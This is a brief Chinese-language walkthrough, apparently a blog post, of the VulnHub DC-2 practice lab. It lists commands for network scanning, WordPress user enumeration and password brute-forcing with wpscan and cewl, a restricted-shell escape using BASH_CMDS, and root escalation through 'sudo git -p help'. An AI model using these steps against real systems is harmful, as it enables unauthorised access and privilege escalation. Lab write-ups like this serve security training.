DC-2
环境准备
DC-1靶机下载地址:https://download.vulnhub.com/dc/DC-2.zip
虚拟机网络链接模式:桥接模式
kali IP 192.168.1.199
靶机 IP 192.168.1.152
ifconfig
nmap -sP 192.168.1.0/24
nmap -A -v 192.168.1.152
kali访问192.168.1.152 DC-2的web
在hosts文件添加对应的ip和域名
vim /etc/hosts
编辑内容,添加 192.168.1.152 dc-2
访问192.168.1.152
wpscan --url http://dc-2 --enumerate u //扫描用户,admin,jerry,tom
vim dc-2_user.txt //将用户写入该文件
cat dc-2_user.txt //查看该文件
cewl -w dc2-passwords.txt http://dc-2 //将cewl生成的密码写进password
wpscan --ignore-main-redirect --url 192.168.1.139 -U dc-2_user.txt -P dc2-passwords.txt --force //爆密码
ssh tom@192.168.1.152 -p 7744
BASH_CMDS[a]=/bin/sh;a export PATH=$PATH:/bin/ export PATH=$PATH:/usr/bin
找到flag3
切换到Jerry用户找到flag4
flag4 提示我们可以使用git,我们可以通过git来提权
sudo -l sudo git -p help
! /bin/bash
浙公网安备 33010602011771号